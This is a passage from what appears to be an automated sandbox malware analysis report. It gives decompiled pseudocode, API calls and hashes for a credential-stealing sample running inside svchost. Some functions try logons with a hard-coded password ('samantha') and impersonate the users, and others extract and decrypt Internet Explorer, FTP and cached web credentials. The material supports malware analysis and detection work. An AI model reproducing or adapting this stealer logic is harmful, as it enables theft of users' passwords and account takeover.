
				_push(_a8);
				_pop( *_t2);
				_v268 = 0;
				_v264 = 1;
				_push(_a4);
				_pop( *__eax);
				_push( &_v272);
				_push(0);
				_push(0);
				_t11 =  &_v264;
				_push(_t11);
				_push(0); // executed
				L1000B8F6(); // executed
				if(_t11 == 0xffffffff || _t11 == 0) {
					return 0;
				} else {
					return 1;
				}
			}








                                                                                                                                        0x100039f6
                                                                                                                                        0x100039f9
                                                                                                                                        0x100039ff
                                                                                                                                        0x10003a09
                                                                                                                                        0x10003a19
                                                                                                                                        0x10003a1c
                                                                                                                                        0x10003a24
                                                                                                                                        0x10003a25
                                                                                                                                        0x10003a27
                                                                                                                                        0x10003a29
                                                                                                                                        0x10003a2f
                                                                                                                                        0x10003a30
                                                                                                                                        0x10003a32
                                                                                                                                        0x10003a3a
                                                                                                                                        0x00000000
                                                                                                                                        0x10003a44
                                                                                                                                        0x00000000
                                                                                                                                        0x10003a44

                                                                                                                                        APIs
                                                                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,00000000), ref: 10003A32
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: select
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1274211008-0
                                                                                                                                        • Opcode ID: 87e4bfe3fc6357befbc3962d8e5f4ed8e8220d36c293ef5895b6508363c80064
                                                                                                                                        • Instruction ID: 8eff1452ecc94eb1f5c6b4ef8c50cd8ab51fca225455f5032155a2471cb06b07
                                                                                                                                        • Opcode Fuzzy Hash: 87e4bfe3fc6357befbc3962d8e5f4ed8e8220d36c293ef5895b6508363c80064
                                                                                                                                        • Instruction Fuzzy Hash: 38F0A034600109EEEB20CB50CC81BDAB7BCEB157A4F108291E698D61D0E7F09AC4CF92
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.09%

                                                                                                                                        Function 10001F38, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001F38(CHAR* _a4) {
				char* _t8;
				signed int _t10;

				_t8 = _a4;
				if(_t8 != 0 &&  *_t8 != 0) {
					_t10 = GetFileAttributesA(_a4); // executed
					if(_t10 == 0xffffffff) {
						return 0;
					}
					return (_t10 & 0xffffff00 | (_t10 & 0x00000010) != 0x00000000) & 0x000000ff;
				}
				return 0;
			}





                                                                                                                                        0x10001f3e
                                                                                                                                        0x10001f40
                                                                                                                                        0x10001f53
                                                                                                                                        0x10001f5b
                                                                                                                                        0x00000000
                                                                                                                                        0x10001f6a
                                                                                                                                        0x00000000
                                                                                                                                        0x10001f65
                                                                                                                                        0x10001f4d

                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(?), ref: 10001F53
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 50ca1663899ea238d9d4f8933858e4c2197070339dd82426c7fcf0bf05897591
                                                                                                                                        • Instruction ID: ed411aa4aec6c6ef364bab04d2e1e02020997d05475f1f61a43318f737b5adec
                                                                                                                                        • Opcode Fuzzy Hash: 50ca1663899ea238d9d4f8933858e4c2197070339dd82426c7fcf0bf05897591
                                                                                                                                        • Instruction Fuzzy Hash: DCE0177121060A6AFB11DA18C8027EA36CACB123E8F014271B924DA1D9CB6CDDA093A5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Function 02442960, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			_entry_() {
				intOrPtr _v8;
				void* _t10;

				_v8 = E024429F0(_entry_);
				E02442B80(_v8);
				E02442500(_t10); // executed
				ExitProcess(0);
			}





                                                                                                                                        0x02442971
                                                                                                                                        0x02442978
                                                                                                                                        0x02442980
                                                                                                                                        0x02442987

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02442500: Sleep.KERNEL32(0000EA60), ref: 02442602
                                                                                                                                          • Part of subcall function 02442500: Sleep.KERNEL32(0000EA60), ref: 02442612
                                                                                                                                        • ExitProcess.KERNEL32 ref: 02442987
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Sleep$ExitProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3633490160-0
                                                                                                                                        • Opcode ID: d5b4b3da077cbe8ad9257c77e459f691ad0f01c67c0f4375af38229beca71731
                                                                                                                                        • Instruction ID: 910770e88f958bf7d7b3b0efe97d87b6fc31a837c79e14eeeb7e3e1d46a809f4
                                                                                                                                        • Opcode Fuzzy Hash: d5b4b3da077cbe8ad9257c77e459f691ad0f01c67c0f4375af38229beca71731
                                                                                                                                        • Instruction Fuzzy Hash: 43D0C7E5D402047BF740FBE59D16B4E76995B00605F100425F90552101FDF177105A67
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.01%

                                                                                                                                        Function 024413D0, Relevance: 1.5, APIs: 1, Instructions: 12memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E024413D0(void* _a4) {
				void* _t2;
				char _t4;
				void* _t5;

				if( *0x24473e0 != 0) {
					_t5 =  *0x24473e0; // 0x2140000
					_t4 = RtlFreeHeap(_t5, 0, _a4); // executed
					return _t4;
				}
				return _t2;
			}






                                                                                                                                        0x024413da
                                                                                                                                        0x024413e2
                                                                                                                                        0x024413e9
                                                                                                                                        0x00000000
                                                                                                                                        0x024413e9
                                                                                                                                        0x024413f0

                                                                                                                                        APIs
                                                                                                                                        • RtlFreeHeap.NTDLL(02140000,00000000,02443349,?,02443349,000000FF), ref: 024413E9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.705841098.0000000002440000.00000040.00000001.sdmp, Offset: 02440000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2440000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3298025750-0
                                                                                                                                        • Opcode ID: 5e9a620dd3833044c2b4e66edc84f8089ae04dc779cf5bfee62b7889cb3bd8f2
                                                                                                                                        • Instruction ID: de058e655e26ace4d2dfcf066ecfb3634a8ba13c0f1f9df72b5a57895ed0e684
                                                                                                                                        • Opcode Fuzzy Hash: 5e9a620dd3833044c2b4e66edc84f8089ae04dc779cf5bfee62b7889cb3bd8f2
                                                                                                                                        • Instruction Fuzzy Hash: CDC012395C07049BF7189B84E495BB673DDA304249F000C04BA0C46980C7F5A4A0CB50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.04%

                                                                                                                                        Function 10001016, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 37%
                                                                                                                                        			E10001016(void* __eax, void* __ecx) {
				void* _t2;
				void* _t5;

				_t2 = __eax;
				_push( *((intOrPtr*)(_t5 + 8)));
			}





                                                                                                                                        0x10001016
                                                                                                                                        0x10001016

                                                                                                                                        APIs
                                                                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 1000101D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateGlobalStream
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2244384528-0
                                                                                                                                        • Opcode ID: 628beeb322d1e68cce6691aa2f8b21e19734e24018de98077d862d5407c9f819
                                                                                                                                        • Instruction ID: d7713b20978494c342f040917a1a09b1ef40ba06d2470294e11926d0b612a070
                                                                                                                                        • Opcode Fuzzy Hash: 628beeb322d1e68cce6691aa2f8b21e19734e24018de98077d862d5407c9f819
                                                                                                                                        • Instruction Fuzzy Hash: D5A0113A3A0A0020EA208E808803F882A028B22B88F008000B308280C088E282A08222
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Function 10001871, Relevance: 1.3, APIs: 1, Instructions: 9COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001871(void* _a4) {

				if(_a4 != 0) {
					LocalFree(_a4); // executed
				}
				return 0;
			}



                                                                                                                                        0x10001878
                                                                                                                                        0x1000187d
                                                                                                                                        0x1000187d
                                                                                                                                        0x10001885

                                                                                                                                        APIs
                                                                                                                                        • LocalFree.KERNEL32(00000000,?,10002A7A,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,00000000,00000000), ref: 1000187D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2826327444-0
                                                                                                                                        • Opcode ID: 7254efa9a6969e93284f9a2bb9ed96fe4a81f90a5ebbcf632798d127335707ae
                                                                                                                                        • Instruction ID: 80d817a30550f4a18f0091231c33790211a9345cf22a378cd8607de6062062a5
                                                                                                                                        • Opcode Fuzzy Hash: 7254efa9a6969e93284f9a2bb9ed96fe4a81f90a5ebbcf632798d127335707ae
                                                                                                                                        • Instruction Fuzzy Hash: C9C09B3150550855D7019E24C94579979D597107C8F80C135760554465DF75DB90C6D4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.06%

                                                                                                                                        Function 10001888, Relevance: 1.3, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                        			E10001888(intOrPtr _a4) {
				void* _t4;

				_t4 = LocalAlloc(0x40, _a4 + 0x80); // executed
				return _t4;
			}




                                                                                                                                        0x10001896
                                                                                                                                        0x1000189c

                                                                                                                                        APIs
                                                                                                                                        • LocalAlloc.KERNEL32(00000040,-00000080,?,10002A53,?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 10001896
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocLocal
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3494564517-0
                                                                                                                                        • Opcode ID: b468feca0c3e71dc907fce6830ce6b324a84b5e517144a4c07ebdcec622e7e02
                                                                                                                                        • Instruction ID: a8eef7f7556d58873c2bd90c27b1ec38d4092bd379410b5a8397de813f9b786e
                                                                                                                                        • Opcode Fuzzy Hash: b468feca0c3e71dc907fce6830ce6b324a84b5e517144a4c07ebdcec622e7e02
                                                                                                                                        • Instruction Fuzzy Hash: E3B092A120060826E240DA48C803F5A73CC9B10A8CF008020BB44A6282C8A8F91042BD
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.05%

                                                                                                                                        Non-executed Functions

                                                                                                                                        Function 1000B56A, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 143UNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                        			E1000B56A(signed int __eax, void* __ecx, signed int __edx) {
				void* _v8;
				CHAR* _v12;
				CHAR* _v16;
				CHAR* _v20;
				CHAR* _v24;
				CHAR* _v28;
				void* _v32;
				void* _v36;
				CHAR* _v40;
				char _v44;
				CHAR* _v48;
				char* _t59;
				int _t61;
				int _t70;
				void* _t71;
				intOrPtr* _t73;
				intOrPtr* _t74;
				void* _t76;
				signed int _t78;
				CHAR* _t80;

				_t76 = __ecx;
				_push(_t71);
				_push(_t80);
				_t78 = __edx ^ __eax;
				_t44 = __eax ^ _t78;
				_t79 = _t78 ^ _t44;
				_push(0x1000b585);
				asm("clc");
				if((_t78 ^ _t44) < 0) {
					_t1 = _t71 + 0xf4d83d;
					 *_t1 =  *((char*)(_t71 + 0xf4d83d)) + 1;
					asm("adc [eax], al");
					if( *_t1 == 0 ||  *0x1000f4e4 == 0) {
						return 0;
					} else {
						_t73 =  *0x1001139f; // 0x287b300
						while(1) {
							_t74 = _t73;
							if(_t74 == 0) {
								break;
							}
							E10002BA3(_t44, _t79);
							if( *0x100113a3 == 0) {
								L9:
								_v8 = 0;
								if(LogonUserA( *(_t74 + 4), 0,  *(_t74 + 4), 2, 0,  &_v8) == 0) {
									_v12 = E100029F6( *(_t74 + 4));
									if(LCMapStringA(0x400, 0x100,  *(_t74 + 4), lstrlenA( *(_t74 + 4)), _v12, _t51) == 0) {
										L14:
										E10001871(_v12);
										_t80 = "samantha";
										L15:
										_v8 = 0;
										if(LogonUserA( *(_t74 + 4), 0, _t80, 2, 0,  &_v8) != 0) {
											goto L16;
										}
									} else {
										_v8 = 0;
										if(LogonUserA( *(_t74 + 4), 0, _v12, 2, 0,  &_v8) == 0) {
											goto L14;
										} else {
											E10001871(_v12);
											goto L16;
										}
									}
								} else {
									L16:
									_v44 = 0x20;
									_v40 = 1;
									 *_t25 =  *(_t74 + 4);
									 *_t27 =  *((intOrPtr*)(_t74 + 8));
									_v28 = 0;
									_v24 = 0;
									_v20 = 0;
									_v16 = 0;
									_t59 =  &_v44;
									_push(_t59);
									_push(_v8);
									L1000BA52();
									if(_t59 == 0) {
										_v48 = 0;
									} else {
										if(_v16 != 0) {
											_push(_v16);
											_pop( *0x1000f159);
										}
										_v48 = 1;
									}
									_t61 = ImpersonateLoggedOnUser(_v8);
									_t62 = _t61;
									if(_t61 != 0) {
										L1000B347(_t62, _t76, _t79);
										if( *0x1000f4d0 != 0) {
											RevertToSelf();
										}
										 *0x1000f159 = 0x80000001;
									}
									if(_v48 != 0) {
										_push(_v16);
										_push(_v8);
										L1000BA58();
									}
									CloseHandle(_v8);
								}
								asm("cld");
								_t44 = 0;
								_t76 = 0xffffffff;
								asm("repne scasb");
								if( *_t80 != 0) {
									goto L15;
								}
							} else {
								_t70 = lstrcmpiA( *0x100113a3,  *(_t74 + 4));
								_t44 = _t70;
								if(_t70 != 0) {
									goto L9;
								} else {
								}
							}
							_t73 =  *_t74;
						}
						return 1;
					}
				} else {
					return _t44;
				}
			}























                                                                                                                                        0x1000b56a
                                                                                                                                        0x1000b570
                                                                                                                                        0x1000b571
                                                                                                                                        0x1000b572
                                                                                                                                        0x1000b574
                                                                                                                                        0x1000b576
                                                                                                                                        0x1000b578
                                                                                                                                        0x1000b57e
                                                                                                                                        0x1000b580
                                                                                                                                        0x1000b584
                                                                                                                                        0x1000b584
                                                                                                                                        0x1000b58a
                                                                                                                                        0x1000b58c
                                                                                                                                        0x1000b59c
                                                                                                                                        0x1000b59d
                                                                                                                                        0x1000b59d
                                                                                                                                        0x1000b739
                                                                                                                                        0x1000b739
                                                                                                                                        0x1000b73b
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000b5a8
                                                                                                                                        0x1000b5b4
                                                                                                                                        0x1000b5cd
                                                                                                                                        0x1000b5cd
                                                                                                                                        0x1000b5ec
                                                                                                                                        0x1000b5fb
                                                                                                                                        0x1000b61f
                                                                                                                                        0x1000b64c
                                                                                                                                        0x1000b64f
                                                                                                                                        0x1000b654
                                                                                                                                        0x1000b659
                                                                                                                                        0x1000b659
                                                                                                                                        0x1000b676
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000b621
                                                                                                                                        0x1000b621
                                                                                                                                        0x1000b640
                                                                                                                                        0x00000000
                                                                                                                                        0x1000b642
                                                                                                                                        0x1000b645
                                                                                                                                        0x00000000
                                                                                                                                        0x1000b645
                                                                                                                                        0x1000b640
                                                                                                                                        0x1000b5ee
                                                                                                                                        0x1000b67c
                                                                                                                                        0x1000b67c
                                                                                                                                        0x1000b683
                                                                                                                                        0x1000b68d
                                                                                                                                        0x1000b693
                                                                                                                                        0x1000b696
                                                                                                                                        0x1000b69d
                                                                                                                                        0x1000b6a4
                                                                                                                                        0x1000b6ab
                                                                                                                                        0x1000b6b2
                                                                                                                                        0x1000b6b5
                                                                                                                                        0x1000b6b6
                                                                                                                                        0x1000b6b9
                                                                                                                                        0x1000b6c0
                                                                                                                                        0x1000b6da
                                                                                                                                        0x1000b6c2
                                                                                                                                        0x1000b6c6
                                                                                                                                        0x1000b6c8
                                                                                                                                        0x1000b6cb
                                                                                                                                        0x1000b6cb
                                                                                                                                        0x1000b6d1
                                                                                                                                        0x1000b6d1
                                                                                                                                        0x1000b6e4
                                                                                                                                        0x1000b6ea
                                                                                                                                        0x1000b6ec
                                                                                                                                        0x1000b6ee
                                                                                                                                        0x1000b6fa
                                                                                                                                        0x1000b6fc
                                                                                                                                        0x1000b6fc
                                                                                                                                        0x1000b702
                                                                                                                                        0x1000b702
                                                                                                                                        0x1000b710
                                                                                                                                        0x1000b712
                                                                                                                                        0x1000b715
                                                                                                                                        0x1000b718
                                                                                                                                        0x1000b718
                                                                                                                                        0x1000b720
                                                                                                                                        0x1000b720
                                                                                                                                        0x1000b725
                                                                                                                                        0x1000b726
                                                                                                                                        0x1000b728
                                                                                                                                        0x1000b72d
                                                                                                                                        0x1000b731
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000b5b6
                                                                                                                                        0x1000b5bf
                                                                                                                                        0x1000b5c4
                                                                                                                                        0x1000b5c6
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x1000b5c8
                                                                                                                                        0x1000b5c6
                                                                                                                                        0x1000b737
                                                                                                                                        0x1000b737
                                                                                                                                        0x1000b749
                                                                                                                                        0x1000b749
                                                                                                                                        0x1000b583
                                                                                                                                        0x1000b583
                                                                                                                                        0x1000b583

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $samantha
                                                                                                                                        • API String ID: 0-1937562511
                                                                                                                                        • Opcode ID: c62eea48d0cb193630d6ac8ef05d684828dc3db16c5eb5ea3f4f34a9721a1fd2
                                                                                                                                        • Instruction ID: 76b21031c5aff4a5446a83bab7b6247621f3dfe9cc1662b97a318598373b60cd
                                                                                                                                        • Opcode Fuzzy Hash: c62eea48d0cb193630d6ac8ef05d684828dc3db16c5eb5ea3f4f34a9721a1fd2
                                                                                                                                        • Instruction Fuzzy Hash: B9516275900904EFFF11CFA0CD46BED7FB5EB043C4F1480A5E910A91AAD7759A50EB21
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 23.02%

                                                                                                                                        Function 10007CB1, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105stringencryptionCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                        			E10007CB1(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr* _a20) {
				char _v1028;
				char _v2052;
				int _v2056;
				int _v2060;
				intOrPtr _v2064;
				char _v2068;
				char _v2072;
				char _v2076;
				void* _v2080;
				char _v2084;
				void* _v2088;
				char _v2092;
				intOrPtr _v2096;
				void* _t53;
				int _t58;

				E1000795C(_a4,  &_v1028, _a20);
				WideCharToMultiByte(0, 0, _a12, 0xffffffff,  &_v2052, 0x3ff, 0, 0);
				_v2068 = 0x10;
				_v2064 = 2;
				_v2060 = 0;
				_v2056 = 0;
				_t53 =  *((intOrPtr*)( *_a20 + 0x44))(_a20, 0, _a4, _a8, _a12,  &_v2076,  &_v2072,  &_v2068, 0);
				if(_v2076 == 0 || _v2072 == 0) {
					return _t53;
				}
				_v2096 = 0xbeef0000;
				if(lstrcmpiA( &_v1028, "Internet Explorer") == 0) {
					L5:
					_t58 = StrStrIA( &_v2052, "DPAPI: ");
					if(_t58 == 0) {
						_t58 = E10007B9C(_v2096, _a12, _v2072, _v2076, _a16);
					} else {
						if( *0x1000f4f4 != 0) {
							_push(_v2076);
							_pop( *_t29);
							_push(_v2072);
							_pop( *_t31);
							_t58 =  *0x1000f4f4( &_v2084, 0, 0, 0, 0, 1,  &_v2092);
							if(_t58 != 0) {
								E10007B9C(_v2096, _a12, _v2088, _v2092, _a16);
								_t58 = LocalFree(_v2088);
							}
						}
					}
					L11:
					_push(_v2072);
					L1000BA70();
					return _t58;
				}
				_v2096 = 0xbeef0001;
				if(lstrcmpiA( &_v1028, "WininetCacheCredentials") == 0) {
					goto L5;
				}
				_v2096 = 0xbeef0002;
				_t58 = lstrcmpiA( &_v1028, "MS IE FTP Passwords");
				if(_t58 != 0) {
					goto L11;
				}
				goto L5;
			}


















                                                                                                                                        0x10007cc7
                                                                                                                                        0x10007ce5
                                                                                                                                        0x10007cea
                                                                                                                                        0x10007cf4
                                                                                                                                        0x10007cfe
                                                                                                                                        0x10007d08
                                                                                                                                        0x10007d3c
                                                                                                                                        0x10007d46
                                                                                                                                        0x10007e69
                                                                                                                                        0x10007e69
                                                                                                                                        0x10007d59
                                                                                                                                        0x10007d76
                                                                                                                                        0x10007dba
                                                                                                                                        0x10007dcb
                                                                                                                                        0x10007dcd
                                                                                                                                        0x10007e58
                                                                                                                                        0x10007dcf
                                                                                                                                        0x10007dd6
                                                                                                                                        0x10007ddc
                                                                                                                                        0x10007de2
                                                                                                                                        0x10007de8
                                                                                                                                        0x10007dee
                                                                                                                                        0x10007e12
                                                                                                                                        0x10007e14
                                                                                                                                        0x10007e2e
                                                                                                                                        0x10007e39
                                                                                                                                        0x10007e39
                                                                                                                                        0x10007e3e
                                                                                                                                        0x10007dd6
                                                                                                                                        0x10007e5d
                                                                                                                                        0x10007e5d
                                                                                                                                        0x10007e63
                                                                                                                                        0x00000000
                                                                                                                                        0x10007e63
                                                                                                                                        0x10007d78
                                                                                                                                        0x10007d95
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x10007d97
                                                                                                                                        0x10007dad
                                                                                                                                        0x10007db4
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000
                                                                                                                                        0x00000000

                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1000795C: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 10007995
                                                                                                                                          • Part of subcall function 1000795C: CoTaskMemFree.OLE32(?,00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 1000799E
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000003FF,00000000,00000000), ref: 10007CE5
                                                                                                                                        • lstrcmpiA.KERNEL32(?,Internet Explorer), ref: 10007D6F
                                                                                                                                        • lstrcmpiA.KERNEL32(?,WininetCacheCredentials,?,Internet Explorer), ref: 10007D8E
                                                                                                                                        • lstrcmpiA.KERNEL32(?,MS IE FTP Passwords,?,WininetCacheCredentials,?,Internet Explorer), ref: 10007DAD
                                                                                                                                        • StrStrIA.SHLWAPI(?,DPAPI: ,?,Internet Explorer), ref: 10007DC6
                                                                                                                                        • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 10007E0C
                                                                                                                                        • LocalFree.KERNEL32(?), ref: 10007E39
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,DPAPI: ,?,Internet Explorer), ref: 10007E63
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.711413483.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_10000000_svchost.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Freelstrcmpi$ByteCharMultiTaskWide$CryptDataLocalUnprotect
                                                                                                                                        • String ID: DPAPI: $Internet Explorer$MS IE FTP Passwords$WininetCacheCredentials
                                                                                                                                        • API String ID: 2957877119-3076635702
                                                                                                                                        • Opcode ID: 843e745e34e14097c07889cfbb8b5dd406fc7868db0434c6aab2a77312663e5e
                                                                                                                                        • Instruction ID: e9adcbc705951ebd3b72bd25d622707a4cd7bfc22d8980c467875790b0128b8c
                                                                                                                                        • Opcode Fuzzy Hash: 843e745e34e14097c07889cfbb8b5dd406fc7868db0434c6aab2a77312663e5e
                                                                                                                                        • Instruction Fuzzy Hash: 7341E87290021DAAEF61DF50CC46FEA7BB9FF08380F0480E4F64865195DB75AA959FD0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: 0.07%

                                                                                                                                        Function 100090E3, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 140stringencryptionUNIQUE
                                                                                                                                        Download Yara Rule
                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                        			E100090E3(void* __eax, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				int _v8;
				char _v12;
				char _v16;
				int _v20;
				char _v24;
				char _v28;
				int _v32;
				char _v36;
				void* _v40;
				void* _v44;
				char _v48;
				void* _v52;
				int _v56;
				char* _v60;
				void* _t55;
				void* _t56;
				int _t77;
				int _t78;

				_t55 = __eax;
				if(_a16 == 0 ||  *0x1000f4f4 == 0) {
					return _t55;
				} else {
					_t56 = _a16;
					__eflags =  *0x10012e8c - _t56; // 0x0
					if(__eflags < 0) {
						__eflags =  *0x10012e90 - _t56; // 0x5
						if(__eflags < 0) {
							__eflags =  *0x10012e94 - _t56; // 0x3
							if(__eflags < 0) {
								E10008860(_a12,  *0x10012e8c,  &_v8,  &_v12,  &_v16);
								E10008860(_a12,  *0x10012e94,  &_v20,  &_v24,  &_v28);
								E10008860(_a12,  *0x10012e90,  &_v32,  &_v36,  &_v40);
								_push(_v32);
								_pop( *_t16);
								_push(_v40);
								_pop( *_t18);
								_v52 = 0;
								_t56 =  *0x1000f4f4( &_v48, 0, 0, 0, 0, 1,  &_v56);
								__eflags = _t56;
								if(_t56 != 0) {
									__eflags = _v52;
									if(_v52 != 0) {
										__eflags = _v56 - _v32;
										if(_v56 <= _v32) {
											asm("cld");
											asm("jecxz 0x4");
											memcpy(_v40, _v52, _v56);
											_push(_v56);
											_pop( *_t29);
											_t56 = LocalFree(_v52);
											__eflags = _v8;
											if(_v8 != 0) {
												__eflags = _v20;
												if(_v20 != 0) {
													__eflags = _v32;
													if(_v32 != 0) {
														_v60 = E10001888(_v8);
														E100018BF(_v16, _v60, _v8);
														_t77 = StrCmpNIA(_v60, "ftp://", lstrlenA("ftp://"));
														__eflags = _t77;
														if(_t77 != 0) {
															_t77 = StrCmpNIA(_v60, "http://", lstrlenA("http://"));
														}
														_t78 = _t77;
														__eflags = _t78;
														if(_t78 != 0) {
															_t78 = StrCmpNIA(_v60, "https://", lstrlenA("https://"));
														}
														__eflags = _t78;
														if(_t78 == 0) {
															E10001522(_a8, _a20);
															E10001522(_a8,  *0x10012e88);
															E10001558(_a8, _v16, _v8);
															E10001558(_a8, _v28, _v20);
															E10001558(_a8, _v40, _v32);
														}
														return E10001871(_v60);
													}
												}
											}
										}
									}
								}
							}
						}
					}
					return _t56;
				}
			}





















                                                                                                                                        0x100090e3
                                                                                                                                        0x100090ef
                                                                                                                                        0x100090fd
                                                                                                                                        0x10009100
                                                                                                                                        0x10009100
                                                                                                                                        0x10009103
                                                                                                                                        0x10009109
                                                                                                                                        0x1000910f
                                                                                                                                        0x10009115
                                                                                                                                        0x1000911b
                                                                                                                                        0x10009121
                                                                                                                                        0x1000913c
                                                                                                                                        0x10009156
                                                                                                                                        0x10009170
                                                                                                                                        0x10009175
                                                                                                                                        0x10009178
                                                                                                                                        0x1000917b
                                                                                                                                        0x1000917e
                                                                                                                                        0x10009181
                                                                                                                                        0x100091a0
                                                                                                                                        0x100091a0
                                                                                                                                        0x100091a2
                                                                                                                                        0x100091a8
                                                                                                                                        0x100091ac
                                                                                                                                        0x100091b5
